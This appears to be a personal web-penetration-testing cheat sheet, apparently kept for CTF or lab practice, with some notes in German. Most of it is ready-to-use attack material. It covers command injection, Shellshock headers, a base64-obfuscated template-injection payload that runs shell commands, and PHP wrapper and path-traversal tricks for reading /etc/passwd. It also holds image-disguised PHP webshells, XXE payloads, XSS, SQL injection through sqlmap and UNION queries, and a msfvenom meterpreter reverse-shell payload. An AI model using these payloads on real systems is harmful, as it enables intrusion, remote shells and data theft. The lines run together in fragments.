nikto -h <website>
web server scannerwapiti -u <website>
web server scannerettercap -G
--> add IP as target --> Mitm menuhttp.request.url contains "login"
python3 -m http.server
ngrok http 8000
nmap <ip>
-sV
Serviceversion-O
Operating system-v
verbose, shows more information about what it´s doing-p 21 80-90
Test specific portsnmap -vv --reason -Pn -A --osscan-guess --version-all -p -oN
just does kind of everything--script=<script name>
run a scriptsslscan <website>
obtains information and shows common misconfigurations like Heartbleedsslyze --regular <website>
gives complimentary informationopenssl s_client -connect<website:443>
shows SSL/TLS informationcurl file:\\localhost\..\..\flag
127.0.0.1;uname -a
test@test.com {{range.constructor("return eval(Buffer('Z2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5yZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY1N5bmMoJ2NkIC8gJiYgLi9yZWFkZmxhZycpLnRvU3RyaW5nKCk=','base64').toString())")()}}
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://<ip>/cgi-bin/test.sh
x='() { :;}; echo VULNERABLE' bash -c :
<website>/robots.txt
tells search engines to not index these directories?page=expect://ls
execution of system commands via the php expect wrapper?page=php://input
your payload is sent in a POST request using curl?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd
base64 encoded
nmap --script ssl-poodle-sV -p 443 <ip>
%2e%2e%2f
is ../
%2e%2e/
is ../
..%2f
is ../
%2e%2e%5c
is ..\
%2e%2e\
is ..\
..%5c
is ..\
%252e%252e%255c
is ..\
..%255c
is ..\
..%c0%af
is ../
..%c1%9c
is ..\
?page=index.html%00.pdf
Website sees a html file the OS a pdf filehttp://website.com/get.php?get=/var/www/html/site.php
shell.php.jpg
passes the filter and the file is executed as phpGIF89a;
<?
system($_GET['cmd']);//or you can insert your complete shell code
?>
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg
hexedit tacos.txt.jpg
first bytes FFD8 FFDB
89 50 4E 47
50 4B 03 04
25 50 44 46
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo
[<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
<user>`&xxe;`</user>
<pass>`mypass`</pass>
</creds>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
john --stdout --wordlist=<cewlwordlist>
john --stdout --wordlist=<cewlwordlist> --rules > <output.txt>
import requests
r = requests.session()
data = r.get(URI).text
import requests
cookies = {'enwiki_session': '17ab96bd8ffbe8ca58a78657a918558'}
r = requests.post('http://wikipedia.org', cookies=cookies)
wafw00f <website>
nmap --script=http-waf-detect
or http-waf-fingerprint
identify a web application firewallTest<script>alert('XSS')</script>
cd /user/share/beef-xss/ ./beef
--> http://127.0.0.1:3000/ui/panelSELECT select_list FROM table_name WHERE username = '' AND password =''
?debug=1
sqlmap -u "http://<website>?parameter=<parameter>
-- dbs
Ausgabe der Datenbanken-- tables -D mydb
Ausgabe der Tabellen der Datenbank mydb-- passwords
Ausgabe von Passwort-Hashes mit anschließend möglichem Wörterbuchangriff-- dump
Erstellen eines Dumps der Datenbank-Tabellen-b
Ausgabe des DBMS-Banners-h
Ausgabe des help-files-hh
Liste aller Parameter und Parameter-Optionen1
produces a valid response1'
--> O/E and 1''
--> Response<true parameter> and 1=1#
--> O/E and <true parameter> and 1=1#
--> Response (Comment in SQL and MySQL)<true parameter> and 1=1--
--> O/E and <true parameter> and 1=1--
--> Response (Comment in SQL)<true parameter> and name like a%
if a% is valid you can continue with aa%<true parameter> order by 2--
if 2 is valid you have at least 2 colums<true parameter> union select 1,2,3,4<etc. as many colums> from <tablename>#
or without table name <true parameter> union select 1,2,3,4<etc.>#
<true parameter> union select 1,2,version(),4 from <tablename>#
<true parameter> union select 1,2,database(),4 from <tablename>#
<true parameter> union select 1,2,current_user(),4 from <tablename>#
<true parameter> union select 1,2,table_name,4 from information_schema.tables where table_schema=database() #
id=1%20and%201=2%20union%20select%20load_file(0x2f6574632f706173737764),2,3,4,5,6,7,8%20from%20mysql.user--
index.php?usr[]
Warning: preg_match() expects parameter 2 to be string, array given1' or 1=1 #
1'
--> no output and 1''
--> output 1' and '1' = '2
--> always false, no result and 1' and '1' = '1
--> always true if id 1 exists, resultmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > payload.exe